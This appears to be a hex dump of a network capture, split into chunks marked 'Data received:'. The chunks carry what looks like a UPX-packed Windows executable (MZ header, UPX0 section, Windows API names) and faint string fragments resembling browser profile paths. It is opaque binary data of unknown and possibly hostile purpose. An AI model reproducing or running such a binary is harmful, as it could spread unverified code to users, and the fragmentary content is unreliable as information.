3fa1 fd31 0906 e91b 01fc 76c6 45ff 014d    ?..1......v.E..M
5830 0d6b 0c36 5083 853c 04a1 10c6 8940    X0.k.6P..<.....@
3609 85e7 e100 f459 51d6 88df e6fe 0663    6......YQ......c
7536 5021 03bd 1683 d87b f6db c9ff 57f2    u6P!.....{....W.
aef7 d149 2651 5031 40ec cd9c fb6a 0268    ...I&QP1@....j.h
2cd0 0fd0 bd47 4a5e c809 24fe 24fe 6490    ,....GJ^..$.$.d.
0b19 ec30 ec71 3742 86ec 3ae8 5c07 406e    ...0.q7B..:.\.@n
07c3 5320 eb4d 3c48 fc0f 0b13 fe83 f902    ..S .M<H........
7638 2434 189b 10d8 8c71 332d 0820 f404    v8$4.....q3-. ..
ffd0 b075 076b 9214 23e8 713e 840f 04c9    ...u.k..#.q>....
4637 e96f 6aa0 e88e 006e faed ee85 bd11    F7.oj....n......
5f5b 8a1d 5ec9 c204 00b8 83ec 64dc 67eb    _[..^.......d.g.
de96 9c6a 6426 0850 bc75 0c11 756d 84e7    ...jd&.P.u..um..
5de4 cc0f b501 10fa 6dc1 8c21 c0b9 583d    ].......m..!..X=
0800 b824 2abf e4be 6cf3 af06 83bc 2430    ...$*...l.....$0
0bf7 5774 736a 2fd9 9e05 f7ff b424 3c0d    ..Wtsj/......$<.
cf78 f042 f63f db61 615c e380 f255 b046    .x.B.?.aa\...U.F
5968 9bed 6cdb 5037 0756 2374 3038 590f    Yh..l.P7.V#t08Y.
affb 748d b71a 1244 f857 0940 e6a4 ef9d    ..t....D.W.@....
7d08 3cef 3806 4454 dcf0 2c77 610c 25e9    }.<.8.DT..,wa.%.
107e 6a53 5537 587f d759 4c55 8d44 241c    .~jSU7X..YLU.D$.
6844 3771 100e 3ff9 ec73 1468 4068 3c1d    hD7q..?..s.h@h<.
7c68 308d 8424 8447 b657 70b6 8f0e 5570    |h0..$.G.Wp...Up
1cbd f36c 76bb 280e bb24 04bf 2068 1c18    ...lv.(..$.. h..
e6f3 3ccf 100c 0400 fc36 9ee7 799e f8f4    ..<......6..y...
f0ec e8e4 799e e779 e0dc d8d0 c8bd 799e    ....y..y......y.
e7c4 c0b8 b055 53ba a8f3 fdd6 dd06 57b9    .....US.......W.
a405 89ab 7452 51b8 9c1c 94b1 db45 5950    ....tRQ......EYP
5957 4b68 8c46 90e7 79be 8841 8480 7c74    YWKh.F..y..A..|t
92a9 9221 948c 799e 67fb 031c 0088 6c68    ...!..y.g.....lh
645c 7350 b60a 468c dc26 b081 5658 369d    d\sP..F..&..VX6.
0450 36f3 3ccf d34c 4844 3c38 3e63 05cc    .P6.<..LHD<8>c..
3482 7b2c ab00 799e ef69 2820 041c 1814    4.{,..y..i( ....
fc9e b1e7 100c 2d04 0004 fc35 f33c cfd3    ......-....5.<..
f4f0 ece4 e0be efb0 cfdc d435 c7d0 09cc    ...........5....
04c4 7598 e779 c0bc b4c1 b4ed c163 8cfb    ..u..y.......c..
32d0 81c4 88ac 14e0 6b32 cd38 0168 1364    2.......k2.8.h.d
0620 f33c df59 e932 0458 504c 9adb 83d9    . .<.Y.2.XPL....
283b 2738 4c06 e8d8 91a6 2688 50c6 4034    (;'8L.....&.P.@4
2067 b4c9 74dd 6459 5021 502c c420 ee0d     g..t.dYP!P,. ..
f68d 4b70 1268 1a6c 0714 f37d 27bf 200c    ..Kp.h.l...}'. .
4801 2804 2c16 303b c837 c858 3838 8c60    H.(.,.0;.7.X88.`
1a70 a5ce 6ce5 7457 6c09 448e 769d 8991    .p..l.tWl.D.v...
6838 b966 5772 3020 d8f3 3c1b 5f20 3232    h8.fWr0 ..<._ 22
3232 9cb4 77d8 c3e4 8400 c818 76f9 d992    22..w.......v...
f52c 6731 3109 27d4 e0a5 b985 0211 2702    .,g11.'.......'.
6a1a 68c0 5777 560e 8e48 5f2c 783d 5928    j.h.WwV..H_,x=Y(
e0e0 54fd 579c 31cf f33c df04 e8e4 e0dc    ..T.W.1..<......
d83c cff3 3cd4 d0cc c8c4 6930 cff3 c0bc    .<..<.....i0....
b891 d8b9 ebb6 ef80 8bc7 6d64 0c00 0768    ..........md...h
0010 ef2b 755f 9b44 823c 452f 78b4 beb3    ...+u_.D.<E/x...
3192 70dd 3120 64f3 6d0d 7958 db54 6550    1.p.1 d.m.yX.TeP
0bcb 1a86 62b2 3988 24f3 6c49 3e38 0a86    ....b.9.$.lI>8..
a840 cd43 77ba 58e8 1080 0144 08f8 ee83    .@.Cw.X....D....
61fb 2bb1 1d83 caff bf38 ff07 eebf b1ca    a.+......8......
8d9c 2434 4896 2bf9 8be9 8bf7 8b6b 0fbd    ..$4H.+......k..
b5fb 140d 8bcd 4f05 a507 20b0 d80f 050a    ......O... .....
a4bf 3033 2cb2 f620 79f7 8be9 8d7c fa2b    ..03,.. y....|.+
e0ad 3324 1a28 5029 68b9 139b 7cfc f8fd    ..3$.(P)h...|...
b807 8813 9b28 4bde 60b9 c1fc 74f5 5d13    .....(K.`...t.].
5b5f 5eee 0b1f 9407 9bc2 5ccc ff25 5822    [_^.......\..%X"
1f0e d66c 0560 cc00 513d 768d 4c7f ecf7    ...l.`..Q=v.L...
fd24 0872 1481 e90b 2d04 8501 1773 ec2b    .$.r....-....s.+
c88b c49b f846 6f0c 8be1 8bc4 4004 50c3    .....Fo.....@.P.
256a ffb5 cb43 0be4 202d 1c64 a123 1b5c    %j...C.. -.d.#.\
e2dd 6d64 8925 073f 6853 f689 3f1b 34fe    ..md.%.?hS..?.4.
65e8 33db 895d fc54 e0a4 830d 809f 8db3    e.3..].T........
b937 7606 845a a00d 7c1d 19d9 760c 8908    .7v..Z..|...v...
0d9c 78a1 98e1 6ed8 fd0c 00a3 880d e811    ..x...n.........
8c39 1d60 0a7c 3657 2a84 ab6c 4e94 e8e3    .9.`.|6W*..lN...
ed36 5f3c a90c 0008 e8ce 0ea1 74c2 5d96    .6_<........t.].
f83f 4594 ac94 3570 0c7d 0dcd 76b6 0390    .?E...5p.}..v...
a0cb 8cb0 047f 17de f332 009b ac16 a188    .........2......
6e30 8975 db16 effe 8c80 3e22 753a 4608    n0.u......>"u:F.
8a06 3ac3 313c 0df2 dbf6 807c 1204 2076    ..:.1<.....|.. v
f2d4 d04e a47d 89df 3448 f645 d001 7411    ...N.}..4H.E..t.
a645 d4eb 0ee9 12ff bc2b 2076 d8eb f56a    .E.......+ v...j
0a58 b753 5340 755b b930 86e4 f797 9833    .X.SS@u[.0.....3
84c3 df50 ea6b 1547 0989 4d88 5051 e85e    ...P.k.G..M.PQ.^
db16 8537 cc59 c38b 2e4c 881f 7cdb 1b69    ...7.Y...L..|..i
30a1 8090 af1e 0376 61b6 7d04 01af 0d2a    0......va.}....*
cec3 c321                                  ...!
Data received: 
    
00e9 dec8 a8ac 2e00 001a 6886 8aff 1d7c    ..........h....|
3142 4580 d503 69bf 208a b05e 7368 6c77    1BE...i. ..^shlw
edf3 ffff 6170 6900 5061 7468 4973 4469    ....api.PathIsDi
7265 6374 6f72 7941 0d0a 046f 976d f925    rectoryA...o.m.%
7373 6572 7002 666e 6503 726b 2eba edee    sserp.fne.rk....
f225 736f 7879 700d 3129 3b23 752b 5fe5    .%soxyp.1);#u+_.
2fb7 e603 3b07 2822 7477 6f00 7072 9b8b    /...;.("two.pr..
edfe 792e 7400 222c 2043 725f 3f18 3b2e    ..y.t.", Cr_?.;.
b1ce b99b 702e 6874 540d 0164 43da 6bae    ....p.htT..dC.k.
6b66 3365 3f64 7b66 addd b6e6 0366 4b70    kf3e?d{f.....fKp
5972 7454 4673 6673 df37 3117 7531 2666    YrtTFsfs.71.u1&f
8598 6edb b9ae 7243 684a 6722 6c07 61af    ..n...rChJg"l.a.
ddbe 9b6b 024f b45f 702f 6573 006b 5c6e    ...k.O._p/es.k\n
5bb9 7200 784b 749f 6f63 6c68 35d7 baad    [.r.xKt.oclh5...
5229 975c 0223 77fc bd8d 8d35 732f 6603    R).\.#w....5s/f.
2e6a 001b 2a2e 2ac2 bf77 bf69 6c6c 615c    .j..*.*..w.illa\
175c 4d6f 7a1f 4170 7044 2acd e00a ee61    .\Moz.AppD*....a
002f 363d 3e23 2e38 b775 1753 0b65 1282    ./6=>#.8.u.S.e..
0348 47b7 b9b7 6b56 ab65 41fb 17c7 4624    .HG...kV.eA...F$
8e70 6c6c 666f 2774 2a63 7212 5769 ebba    .pllfo't*cr.Wi..
eedb 0377 8772 0f56 176f d870 35c1 7d3b    ...w.r.V.o.p5.};
37d7 4f6c 649a 6f97 a86d e76e 6e72 8748    7.Old.o..m.nnr.H
6f73 bf94 6e64 07b7 dd6e dd43 75b3 6ed8    os..nd...n.Cu.n.
7273 175c 4567 6c63 39c3 db76 725c 5313    rs.\Eglc9..vr\S.
6c07 2046 6f07 87cd 95a8 b040 3365 2d0c    l. Fo......@3e-.
7e86 edd6 996e bd54 0275 749f 536d 9d7b    ~....n.T.ut.Sm.{
84dd 644d 1b61 6777 696d 6541 ff25 b275    ..dM.agwimeA.%.u
8708 13a1 0979 416d ddcf b9ee 5c72 496c    .....yAm....\rIl
4a41 2353 79e7 65b5 e60c df6d 520b 6f5b    JA#Sy.e....mR.o[
7647 10f7 76db cd97 7c2e 658b 2239 2220    vG..v...|.e."9" 
4143 8ef6 7ddf 74dc 740a 5c4f 32f3 0b70    AC..}.t.t.\O2..p
78d7 704a 6591 6820 6164 3edb 8fd9 f7d0    x.pJe.h ad>.....
676c 733b 204c 4522 25e6 5638 9873 1503    gls; LE"%.V8.s..
0a64 64ee 753f 1aa5 7f67 20c7 3027 1260    .dd.u?...g .0'.`
165c ec4e 4142 4e17 4f69 d8fd 70ad bb56    .\.NABN.Oi..p..V
1967 6e69 6543 5026 b7b1 d645 bd2d 457c    .gnieCP&...E.-E|
424c 8fb6 61f8 5a77 866a 20d7 dbc7 c7df    BL..a.Zw.j .....
8c79 560c 723d 22a9 6357 bd1d dac7 74ab    .yV.r=".cW....t.
2231 9a44 2248 4b86 18ee b98f 6674 4d1c    "1.D"HK.....ftM.
ca90 efc1 151c 3792 4bca 6ef4 3c8d 7076    ......7.K.n.<.pv
a920 530a 7239 76be 85e7 2e87 202f de59    . S.r9v..... /.Y
af63 5a3a be28 30e7 594e 5c79 4f76 7e18    .cZ:.(0.YN\yOv~.
5ceb 3f65 5e43 bb9b 3b3c dbaa c01e b53e    \.?e^C..;<.....>
5e02 45be 5d9d 734f 5c08 478d 4f52 4c30    ^.E.].sO\.G.ORL0
331e 8bc2 5832 9bc7 c3b4 7d4c 6d10 3a74    3...X2....}Lm.:t
74eb 183b 5a24 1c09 7769 73ed 351e cd36    t..;Z$..wis.5..6
670b 5f63 eeb9 6bd2 9b82 205b 2f31 203e    g._c..k... [/1 >
6f07 98a6 a552 6d9e 7374 33bb 6efa 6ade    o....Rm.st3.n.j.
df73 f377 6564 ed72 61d9 646a 6e03 2022    .s.wed.ra.djn. "
4509 946e 652e bd93 6b66 7706 3f07 7200    E..ne...kfw.?.r.
c37c 6a6a 0006 38bf 4c45 fcdb 32b9 5a2f    .|jj..8.LE..2.Z/
5b58 0764 43ad 35b9 9357 1b58 0045 6307    [X.dC.5..W.X.Ec.
5ae9 ce45 004b 68f7 d5b9 c082 735f 6bad    Z..E.Kh.....s_k.
2d9f 7665 2b34 f0ab 3d72 003a 9e79 161f    -.ve+4..=r.:.y..
e081 df16 fe00 1700 6168 005d e9f5 7c8b    ........ah.]..|.
7269 2a27 4aaf 63ef 3ddf 6e43 2f00 8755    ri*'J.c.=.nC/..U
5c53 6f4d 0773 915b 1fb8 6181 475c 8763    \SoM.s.[..a.G\.c
7263 aed7 6a3a dd07 df0f 5cf9 c135 db49    rc..j:....\..5.I
6e77 6e74 c81b 7620 5096 3737 c73e a361    nwnt..v P.77.>.a
6252 0044 5744 81ad 80eb 6031 0332 b72c    bR.DWD....`1.2.,
93dd 0cb4 ae5f 0363 7617 9c66 20f9 0d9a    ....._.cv..f ...
739c 002b 576f 746f 203a 700d 74dd 1b64    s..+Woto :p.t..d
f866 5857 ad3a 4cce 1593 0317 408b 62b5    .fXW.:L.....@.b.
ccc2 57e3 5c0b 61de 88d3 6078 0957 8464    ..W.\.a...`x.W.d
a00a 90cb 2601 ef0a 15ba 0371 c701 4d5a    ....&......q..MZ
9000 3511 a6a1 0303 04af b876 0032 0817    ..5........v.2..
4001 0405 78f9 ff0e 1fba 0e00 b409 cd21    @...x..........!
b801 4c54 6869 be1b dda8 0112 da6d 2039    ..LThi.......m 9
6edb 2f75 a16e ae20 626b 7275 6e20 6902    n./u.n. bkrun i.
44d8 5217 fa4f 5320 6d6f b52e 0d26 2442    D.R..OS mo...&$B
bb3f ec3f efac 54e0 abcd 3ab3 03d0 d136    .?.?..T...:....6
b3a8 07c4 d21f b91b ec3e b3a9 13ad 0f28    .........>.....(
d134 43d2 30b3 fcd8 67b1 af07 1ffd d229    .4C.0...g......)
0fab cd3b b3e2 72f3 5dd3 c9a2 079d eb31    ...;..r.]......1
b3aa 54ed 3e8e ec6d 3452 a068 4bc2 500e    ..T.>..m4R.hK.P.
fbc2 a630 4c01 012e 48c2 4913 e03a d56c    ...0L...H.I..:.l
dfd5 210b 0106 0c30 1088 58e7 829a 43aa    ..!....0..X...C.
d203 b022 92bd c3d8 1017 0237 0007 0bd2    ...".......7....
05d9 33c0 2a03 029b f06c d907 0624 b263    ..3.*....l...$.c
4f51 7785 f024 0262 6427 0c6f e403 84a3    OQw..$.bd'.o....
5550 5830 7090 9ae5 6c64 c427 80e0 31b9    UPX0p...ld.'..1.
b2ef 452d ff2e 2740 b2c1 263b 32dc b023    ..E-..'@..&;2..#
3227 07a2 909a c06e 332e 4bff ffc3 3032    2'.....n3.K...02
e721 0d09 020a 3091 95ff 0234 02a5 518b    .!....0....4..Q.
bf1b 4d7f 599a 2a62 493a e577 dbfd e8c7    ..M.Y.*bI:.w....
06ff 6ffc ffe9 0410 b903 5f48 097f 68b9    ..o......._H..h.
9cec ddef 1832 6e59 c315 26b8 34c1 deff    .....2nY..&.4...
ffff adb9 188c 5156 8bf1 8975 f08d 4e38    ......QV...u..N8
c745 fc02 2c15 2f06 6a01 9ebf bd17 fe16    .E..,./.j.......
f4dc 1020                                  ...
Data received: 
    
c633 1240 5480 65fc fbfe b3ff ffff ffcb    .3.@T.e.........
cf0e 834d fcff 8bce 0d8b 4df4 5e64 890d    ...M......M.^d..
db3f f9ee 3a00 c9c3 58e1 518a 45f3 56ff    .?..:...X.Q.E.V.
ffff ff57 5d33 dfb9 d9b7 ff5f ec57 8806    ...W]3....._.W..
2d14 4757 897d fc88 05ec 1db0 0111 2057    -.GW.}........ W
6d12 6544 edff ff5f b6df 5588 4638 897e    m.eD..._..U.F8.~
3c02 4044 8bc6 5f64 f66f 7dfe ffff 234b    <.@D.._d.o}...#K
5333 db39 5d08 7425 a112 6028 3bc3 7408    S3.9].t%..`(;.t.
503c efde 633f b059 ffff 5f88 3b09 c059    P<..c?.Y.._.;..Y
a31a f001 bb39 1d1b 2e77 7f0a 560f 850c    .....9...w..V...
b5fc 85e2 ff57 bf50 2819 51dc d7fd ecfb    .....W.P(.Q.....
bcff 3709 d03d b4db ffbf 54b9 1350 c27f    ..7..=....T..P..
f7ff 7b34 328b 3545 85c0 75ad c7ff 85ff    ..{42.5E..u.....
ff04 4381 ff35 307c c8eb 228b 407e ffed    ..C..50|..".@~..
fb0c 22ff 3023 2c1d 7403 50ff 7f23 faeb    ..".0#,.t.P..#..
07ff 349d 4dbb 5d78 cf73 833d 056d 7525    ..4.M.]x.s.=.mu%
d608 55fe db6f fd03 c3dc e572 09c3 ec0b    ..U..o.....r....
9a9c 376e 6cd8 0950 2ec2 5e5b ffff 6f88    ..7nl..P..^[..o.
f5db 81ec 9cbb b11f 73e6 422c 0056 7556    ........s.B,.VuV
86b4 a452 0cff 9717 f8ee 6bff 7c04 5f8d    ...R......k.|._.
8564 b9f0 4623 dfb7 6cb5 14c8 ffff ffff    .d..F#..l.......
0dec 12e4 0c3b 3b73 6723 5019 dc28 062c    .....;;sg#P..(.,
7358 b6cd f02c 83d3 8c14 0210 0cdb b6d0    sX...,..........
feff ffff 4d32 1589 858b 025e 8910 9266    ....M2.....^...f
6c84 0065 7c86 304b c3fb b6e7 2c28 5684    l..e|.0K....,(V.
071c 6bc2 ffc2 df96 9b7d dfe8 0d18 b57e    ..k......}.....~
207b e832 d371 2530 90f8 47f4 ff7e 7fc7     {.2.q%0..G..~..
0b99 3051 533f 7d0c e7b6 ddf8 ffbf 117d    ..0QS?}........}
a9ed 5d10 33f6 f02b d989 7f78 faff ffff    ..].3..+...x....
1f18 083f 1bdc 99f9 fc8d 043e 5bc4 7356    ...?.......>[.sV
0e46 dcee c3f6 3bf3 7ee4 315f 50c0 ffff    .F....;.~.1_P...
df68 21eb f44c 5df8 addb 5710 4853 450c    .h!..L]...W.HSE.
563b c157 d28b fbd1 5ff8 ffbf c6ee 544f    V;.W...._.....TO
4d10 eb03 7810 8b84 7f79 78b7 aa57 9015    M...x....yx..W..
7604 a344 ffff ffff 7e15 03f8 3b7d 7be1    v..D....~...;}{.
f6ee 107d 0e3d 6a00 2bc7 cf04 1fed df6a    ...}.=j.+......j
0222 60ba c106 3e07 ffff ffff 386c 5ddc    ."`...>.....8l].
f6db 8f33 3c57 6a0f 595c 8d7d c4f3 ab37    ...3<Wj.Y\.}...7
0ca8 b10b 9bdb 5dd4 4005 d80e f8ff 6fff    ......].@.....o.
c450 ce34 1762 4f96 c50b c43c 516f bff1    .P.4.bO....<Qo..
6718 01c0 83f8 0136 06ff ff7f a909 dc95    g......6........
83c8 ff6c 4cc6 78c2 ef20 c284 b3d6 31bb    ...lL.x.. ....1.
0498 2da2 ffff ffff f0ec 114a ed6b a553    ..-........J.k.S
9196 135c 4171 59fa 9d35 7515 5787 f566    ...\AqY..5u.W..f
dbf0 74db f77f 6689 ffff ffff 5df2 885d    ..t...f.....]..]
f466 abaa 14f9 0af8 17e0 c8d2 0db6 ab11    .f..............
e520 e2e4 f6bd cd30 e958 0de8 ff06 ffff    . .....0.X......
1d56 561d ad2d 34fc 45f2 8b46 0c26 6a2b    .VV..-4.E..F.&j+
c5ce db6e be97 f4e0 ffbf fdff 5056 7350    ...n........PVsP
5f74 150f f01b d8a5 cd59 6474 04b6 eb09    _t.......Ydt....
0ece f01e dc38 ca8f c2ff ffff 08cc 14cc    .....8..........
3e6c ffc2 5638 d057 7438 3918 742b c58b    >l..V8.Wt89.t+..
9c8b fa0f 0477 9fff ffff ff51 52df d334    .....w.....QR..4
83e9 82f0 bbc6 4b39 1e75 d732 c06a 37f3    ......K9.u.2.j7.
f6f6 b052 8529 ac59 2759 ffff c6ff 750b    ...R.).Y'Y....u.
286d bcf4 1fe6 ebd5 e4eb d33c 7424 0c44    (m.........<t$.D
7c61 bb7b ba04 5668 12ff ffff be57 8c04    |a.{..Vh.....W..
a184 5105 2e17 2619 7b58 eb4f 143c 0441    ..Q...&.{X.O.<.A
ebe9 8c3c 3bff ffff f613 4803 2f5c 7c32    ...<;.....H./\|2
f280 04eb c168 f6d8 1bb2 01d7 2eb8 e005    .....h..........
9ae0 0235 ffff ffff 0d71 696b 21b4 14c9    ...5.....qik!...
1768 f000 cd2a 7cc3 c83e 8d4d e088 30e1    .h...*|..>.M..0.
3769 c1b1 7d5b fd6f ffed ff4b 882e df3e    7i..}[.o...K...>
e36e 02c9 e77b 6a20 cba5 f8cf ff59 746a    .n...{j .....Ytj
67ac 51ff ffff 81a7 4750 302f 14e5 a0e1    g.Q.....GP0/....
1ffb db74 54f8 2bf7 8d7e 0157 13a4 03fa    ...tT.+..~.W....
8d2f 73d8 8bd1 3b3c dd46 d256 5419 6fff    ./s...;<.F.VT.o.
897a 77ca 5375 30c5 6863 20a8 eba6 1038    .zw.Su0.hc ....8
ffff 97fe e64e 5e53 8a19 6083 81b6 195c    .....N^S..`....\
8fd8 ade0 a6d7 0d74 8740 aba1 045c ffff    .......t.@...\..
ffff e630 7bb0 9dbd 8d17 9858 b3f0 0e42    ...0{......X...B
8107 0e24 ff9d 5b9e fab5 200d bb30 1e41    ...$..[... ..0.A
441d a2ff ffff bac2 f667 3ffc 290c 58ac    D........g?.).X.
b0bf bbfc 1548 837d 7427 605f 9869 c0ff    .....H.}t'`_.i..
ffff 170a 5d83 b95b 7724 8b29 8b23 9180    ....]..[w$.).#..
490b 513c 1c68 6732 4cbf 1f5d 40c1 ffff    I.Q<.hg2L..]@...
ffff ce7e 8364 3f94 5340 5741 c007 661b    ...~.d?.S@WA..f.
5853 78f2 5f78 edd4 e0fb f108 5e28 8423    XSx._x......^(.#
130c ffbf f4ff d731 fbbb 8ba7 5f88 2bc8    .......1...._.+.
c1f9 04b6 bf9d 8db9 efc2 50a4 0553 a768    ..........P..S.h
ffff ffff e444 3cc9 6c4f b683 f036 0853    .....D<.lO...6.S
5098 a427 d774 9da1 90ba 06a0 03b0 c060    P..'.t.........`
f5e1 d6c1 ffff ffff 4cc2 032d 7505 3768    ........L..-u.7h
56ad fbae bb2b 4dd0 1ad0 ac08 7e8d 5590    V....+M.....~.U.
4a52 06bb aedb daa0 ff2f fdff 5247 05b0    JR......./..RG..
2a04 0dc0 03d0 5241 7be0 c5d0 ef60 d48c    *.....RA{....`..
ccc8 c8d6 8ad6 fadf feff 05c0 b0a0 56c0    ..............V.
6c27 7409 9005 0b43 3050 ecfa f442 347b    l't....C0P...B4{
eb08 b7ff 2ffc 5fd8 ec52 2c7c 6624 ec75    ..../._..R,|f$.u
1d12 ec1c 19e4 91e0 4d7d e404 7407 ffff    ........M}..t...
ffff 8cbd f4bb eeec 0168 c646 9d46 7f06    .........h.F.F..
2ab7 b630                                  *..0
Data received: 
    
d00c a2a5 a504 575b 3add c6f3 4015 d2ff    ......W[:...@...
ffff e85e cbdb 5314 1367 fc40 d506 8953    ...^..S..g.@...S
2708 952e a1f0 8949 345f 8df0 49ff ffff    '......I4_..I...
ff38 f1b9 bd1e d499 b3f9 57d5 2a14 660f    .8........W.*.f.
8b0e fd4b afdd ba65 070a 2d47 0857 0a20    ...K...e..-G.W. 
ff6f 6fff 745f e036 a42f b389 7b51 3683    .oo.t_.6./..{Q6.
aedc d68d c324 fcd3 f5dc 56c7 fc6f 4bff    .....$....V..oK.
ff1e 9d50 a2d0 5e3a be04 2f6b 9c7c d0f9    ...P..^:../k.|..
4475 1139 ff2f f42f f40c ac8d bf8c 53c7    Du.9././......S.
b207 808d 6580 c715 ac3d 7246 ffdb 0bff    ....e....=rF....
1e94 b81c 120b 54c3 1457 6b35 31c8 5ef8    ......T..Wk51.^.
fee3 09d7 1850 815f e0ff 7474 26be 063a    .....P._..tt&..:
af5e ff36 66b7 b244 430f 9565 fcff ff7f    .^.6f..DC..e....
59c6 ef76 bbe3 1c41 8b17 5f70 2b5f 683b    Y..v...A.._p+_h;
d374 3955 4991 0c3c 7c74 31d5 ffff ff2f    .t9UI..<|t1..../
6b75 9c6d a624 4152 a748 0212 bb68 fd76    ku.m.$AR.H...h.v
e239 0529 7507 8681 0f30 c34d bf01 fdff    .9.)u....0.M....
0a60 3082 2a91 1ffa e31d 84a3 2f48 afaa    .`0.*......./H..
8089 3df4 ffff ffff a118 c190 4d53 dbe4    ..=.........MS..
231b 686c 146a a3e3 03d4 f0c2 97dd 3f0e    #.hl.j........?.
a28b 5514 9e60 3875 bff4 ffff 028b d6a2    ..U..`8u........
7b73 5bf7 103b cb08 ce57 0889 08c6 5257    {s[..;...W....RW
ab7b 5762 4d23 ff85 5fe0 5950 90b5 2924    .{WbM#.._.YP..)$
0fbe 047b d899 26bb 530f 5024 ffff ffff    ...{..&.S.P$....
4cd8 ed35 26a1 2352 b406 28ed b722 f198    L..5&.#R..(.."..
1619 0e1d 0b53 6bc0 1e58 c38b fed0 5652    .....Sk..X....VR
ffff b7f8 7d1d 9427 b999 40bd 3c53 ece5    ....}..'..@.<S..
0e6b 8a5c 1069 f04d 36fb 9be1 f8ff ffff    .k.\.i.M6.......
6290 ce74 4d3b fb7e 762a 4c24 873d 5b31    b..tM;.~v*L$.=[1
5150 524c 9bb8 0d1b 4f4c ebb3 97ff ffd6    QPRL....OL......
37f5 bdd5 ce26 ca5e d90f 9fc3 23c2 c93a    7....&.^....#..:
3cb0 8ac3 90e6 ff85 ffff 3cdf d7b0 0f86    <.........<.....
3f81 f7b0 04ac a80b 414e 2e05 ff98 49e4    ?.......AN....I.
db94 2443 ffff dffe 60d9 148d 8d23 7096    ..$C....`....#p.
dca1 a667 0582 c118 a991 2a2b 3131 6653    ...g......*+11fS
ccdd 5410 ffff ffff 2e36 4dc0 88f6 7a87    ..T......6M...z.
5623 463d 7405 afa2 fb96 ed6a 3f88 c7fd    V#F=t......j?...
59d9 d908 f3af 258b 83ff ffff 756b 496b    Y.....%.....ukIk
6821 8687 6668 8cfd 6df9 7e2c 85f0 1992    h!..fh..m.~,....
fdfd eb0e 8f31 ff6f fc7f 30be 8558 61e4    .....1.o..0..Xa.
bcac 8549 f7da d0d0 07d8 7957 92ed 6e90    ...I......yW..n.
bd02 2cf4 ffff 7419 2cd4 6c06 b08f 370b    ..,...t.,.l...7.
597e 0599 9045 84cc 5506 8803 fc0d fe2f    Y~...E..U....../
c8c2 dcec 2558 ff6b 6101 647a 9478 2ea3    ....%X.ka.dz.x..
2992 feff ff0b 42c3 7023 b84b 1eeb 6c60    ).....B.p#.K..l`
27e7 10dd 215c 20a0 2ca8 6b05 5fa4 25bf    '...!\ .,.k._.%.
fdff 371d 1262 a49c 455c 875c f27c 5a58    ..7..b..E\.\.|ZX
5444 1435 0920 b0b8 06c0 377e fbff 1a6d    TD.5. ....7~...m
23d3 552f b48c c36e 5f72 5fdf c7f4 0c7e    #.U/...n_r_....~
71bd d8fe ffbf ddfe 2f8c 434e 3c0c 9e08    q......./.CN<...
913c 2807 3bb0 962b 75c8 06b8 3d8f 7cfb    .<(.;..+u...=.|.
ffff ffff dee8 2f38 2f3c 47fd 0c7c 8f27    ....../8/<G..|.'
b0f7 c792 87d9 2772 a0e2 012b 29c9 d083    ......'r...+)...
054c 498a 8385 02ff 2e7e f814 fc07 89c8    .LI......~......
295d 049c f4ff 2f71 eb6e 8c63 b0a9 8ff0    )]..../q.n.c....
c1fe 04c1 5f38 6875 fcf8 f0ff 6fb0 294a    ...._8hu....o.)J
d064 33d2 59f7 f13b 158a 7342 adb7 250b    .d3.Y..;..sB..%.
ff2f fc6f 8151 1074 30f4 0e59 e8e1 1651    ./.o.Q.t0..Y...Q
1234 4f10 1a0f 36f8 decd ff17 fe1b 1505    .4O...6.........
4701 cc53 cac1 a615 e43b 399f c0b2 41ca    G..S.....;9...A.
c2d1 ffff dfe2 bb3a 112c b508 105f 0871    .......:.,..._.q
f4b9 c0ad 5f83 ff73 7df4 135d 5bfb ff6f    ...._..s}..][..o
f185 cd2b e85d e46a 3fbe 172e 6873 8906    ...+.].j?...hs..
ae06 8c61 e1ff ff0b 551e c562 cf3e f768    ...a....U..b.>.h
1d68 0518 1103 9f31 d680 0158 d295 ffff    .h.....1...X....
df7e 0424 856b b81d ec50 d5f8 c65d 1859    .~.$.k...P...].Y
dffc d5b6 4596 5dc5 53e8 1477 ffff ffff    ....E.].S..w....
850a 856c c9d9 1114 e410 fa56 b7bf 2374    ...l.......V..#t
063b c773 0218 8b03 a603 4514 50cc d1c6    .;.s......E.P...
ffff ffff bac9 f8e9 8411 1e14 46fb 7c5f    ............F.|_
32e0 04dc d801 6c49 6393 63c0 4c46 53c8    2.....lIc.c.LFS.
1050 4946 ffff ffff 4e6e 17e4 fec4 0cd8    .PIF....Nn......
c28b c918 ff9f 85f8 1a9f b502 bc2b 8c73    .............+.s
9cf0 85f6 049b b916 83ff 854a 3665 d1db    ...........J6e..
874d bd45 183c 1111 ff85 ff7f 8d46 013f    .M.E.<.......F.?
eace 88d7 87a0 f6ec d77e 8a2b 5fea 063c    .........~.+_..<
0d5d 3c0a ffff 85fe 7503 4eeb f346 2e9c    .]<.....u.N..F..
186c 7483 0931 d0f7 2be8 f8a0 7ce4 a0f8    .lt..1..+...|...
6fbd f4ff e3a5 4a75 38da f918 e567 f303    o.....Ju8....g..
0e1b 3564 ac2b 24f8 ffff bfc0 034d f797    ..5d.+$......M..
2037 3ff6 8bc1 03fa 252b 55ec 8bc8 0155     7?.....%+U....U
fced cd5e fcff 06ff ab6c 1e42 1916 a139    ...^.....l.B...9
5060 cc7c b2b4 364e 20b2 81f0 f4a5 ffff    P`.|..6N .......
ff2f 0d78 800d f080 ce81 9fde 6531 6824    ./.x........e1h$
7726 62ef 18ee e10f 4913 4056 18b8 ffff    w&b.....I.@V....
ffff 1a7f 48b1 b671 d2cd 030d 16e5 a96f    ....H..q.......o
f184 1c74 bb61 076a 2256 e9b6 97a5 06d0    ...t.a.j"V......
d3d2 faff adff a76a 1464 5961 ce9d da6b    .......j.dYa...k
bc06 caa3 746c a136 8012 3982 92be d137    ....tl.6..9....7
3651 fc75 74ef 8875 1ae5 eec0 515f e2ff    6Q.ut..u....Q_..
b785 9130 129f cc56 dde1 15ed a2c4 1a85    ...0...V........
2d7c 5d0c                                  -|].
Data received: 
    
df36 faff 4adb 85a5 2187 389f 7f6f 8f19    .6..J...!.8..o..
747d 0a41 0548 2b8d ffbf f0ff b405 7532    t}.A.H+.......u2
5229 d26b 500f 5db5 d285 4ded 582b 2363    R).kP.]...M.X+#c
03c8 b302 55c3 ff85 feff 6f74 42b0 8c40    ....U.....otB..@
ff25 c606 32fc d997 b5f0 0130 ff21 4800    .%..2......0.!H.
75aa a5ff ffff 77f6 99ba bef4 a882 8041    u.....w........A
0ba0 07d7 e27c cf10 9804 90e7 0598 f1c2    .....|..........
